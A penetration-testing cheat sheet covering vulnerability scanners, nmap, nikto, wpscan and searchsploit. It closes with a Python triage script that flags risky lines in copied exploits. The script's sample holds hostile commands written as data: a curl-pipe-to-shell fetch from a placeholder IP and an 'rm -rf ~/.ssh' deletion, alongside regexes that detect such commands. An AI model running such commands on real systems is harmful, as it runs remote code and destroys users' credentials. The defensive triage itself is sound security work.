Vulnerability
Perform vulnerability scanning and exploit research.
Vulnerability Scanner
Nessus
A very powerful vulnerability scanner.
Runs on port 8834/tcp.
Nessus has two parts (both can be on the same machine):
Client to configure the scan.
Server to perform the scan and send the results to the client.
OpenVAS
A free, open-source vulnerability scanner.
Runs on port 8080/tcp.
Like Nessus, OpenVAS also has two parts (both can be on the same machine):
Client to configure the scan.
Server to perform the scan and send the results to the client.
Tools & Other
/usr/share/nmap/scripts/
nmap --script-updatedb
nmap --script-help <SCRIPT>
nmap --script "<SCRIPT or TYPE>" <IP>
Web server scanner.
nikto -h <URL> -o <OUTPUT.html> -Format html
WordPress Security Scanner.
wpscan --url <URL> --random-user-agent -o <OUTPUT> --enumerate p --plugins-detection aggressive --api-token <API_KEY>
Research Exploit
Analyze any exploit you find very carefully before using it: it could be harmful!
Local, offline copy of the Exploit-DB database.
searchsploit -u (update)
searchsploit <STRING> (get ID)
searchsploit -w <STRING> (get LINK)
searchsploit -x <ID> (view the exploit)
searchsploit -m <ID> (copy exploit + info)
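A first-pass triage for the warning above about harmful exploits, as an added example that is not from the original page: it flags lines in a copied exploit that deserve a close read before anything is executed. The rule set, labels, `triage` function and sample file are assumptions made for illustration, and a clean result does not mean the code is safe.

```python
import re
import sys

# Heuristic rules: constructs worth reading closely before running
# third-party exploit code. Labels and regexes are this example's choices.
RULES = [
    ("destructive command",
     re.compile(r"\brm\s+-[a-zA-Z]*[rf][a-zA-Z]*\s+(/|~|\$HOME)|\bmkfs\.|\bdd\s+if=.*\bof=/dev/")),
    ("download and execute",
     re.compile(r"\b(curl|wget)\b[^\n|;]*\|\s*(ba|z)?sh\b")),
    ("hard-coded IP address",
     re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")),
    ("opaque byte string",
     re.compile(r"(?:\\x[0-9a-fA-F]{2}){16,}")),
    ("long base64-like blob",
     re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")),
    ("shell or dynamic execution",
     re.compile(r"\b(eval|exec|os\.system|subprocess\.\w+|system)\s*\(")),
]


def triage(source):
    """Return (line_number, label) pairs that deserve manual review."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, label))
    return findings


# Constructed sample standing in for a file copied with `searchsploit -m <ID>`.
SAMPLE = r'''#!/usr/bin/env python3
# PoC for ExampleApp 1.0 (constructed sample, not a real exploit)
import os, sys
target = sys.argv[1]
buf = b"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
os.system("curl -s http://192.0.2.10/setup | sh")
os.system("rm -rf ~/.ssh")
print("sending", len(buf), "bytes to", target)
'''

if __name__ == "__main__":
    # With a path argument, triage that file; otherwise the constructed sample.
    text = open(sys.argv[1], errors="replace").read() if len(sys.argv) > 1 else SAMPLE
    for lineno, label in triage(text):
        print(f"line {lineno}: {label}")
```

Run it on the file copied by searchsploit -m, then read every flagged line in context; the sample's lines 6 and 7 do things unrelated to a proof of concept's stated purpose, which is the pattern to look for.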